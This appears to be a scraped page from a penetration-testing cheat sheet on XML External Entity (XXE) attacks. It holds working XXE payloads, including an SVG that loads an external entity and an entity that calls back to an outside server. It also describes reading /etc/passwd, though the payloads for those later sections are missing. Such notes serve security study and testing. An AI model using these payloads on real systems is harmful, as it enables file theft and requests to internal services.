XXE - XEE - XML External Entity

How to exploit XML External Entities (XXE). This allows a remote attacker to read files off of the filesystem, make HTTP requests to internal services/applications, and read the responses.

XXE with SVG

Because SVG is XML, it can also have XXEs:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [
  <!-- an internal subset can be embedded here -->
  <!ENTITY xxe SYSTEM "https://example.com/foo.txt">
]>
<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <text x="20" y="35">My &xxe;</text>
</svg>
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://server/pixel?callback_token=ee34a1791ab345f789">
]>
<r>&sp;</r>

Read file

Lets try to read /etc/passwd in different ways. For Windows you could try to read: C:\windows\system32\drivers\etc\hosts

In this first case notice that SYSTEM "**file:///**etc/passwd" will also work.

This second case should be useful to extract a file if the web server is using PHP (Not the case of Portswiggers labs)

In this third case notice we are declaring the Element stockCheck as ANY

Directory listing

In Java based applications it might be possible to list the contents of a directory via XXE with a payload like (just asking for the directory instead of the file):

PreviousSVG SSRF CheatsheetNextJWT Vulnerabilities (Json Web Tokens)

Last updated